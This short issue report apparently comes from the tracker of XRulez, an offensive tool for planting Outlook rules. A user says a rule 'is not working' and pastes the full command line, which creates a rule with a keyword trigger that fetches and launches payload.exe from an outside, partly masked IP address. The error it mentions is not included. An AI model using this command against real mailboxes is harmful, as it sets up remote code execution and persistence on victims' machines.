RULE NOT WORKING

Hiii I am running the tool as XRulez_h64e.exe -a --profile Outlook --name payload --trigger testpaylos --payload http://87.-----2.67:8000/payload.exe on Windows 10 system for outlook Office 365 MSO 64 bit but I am getting the below error
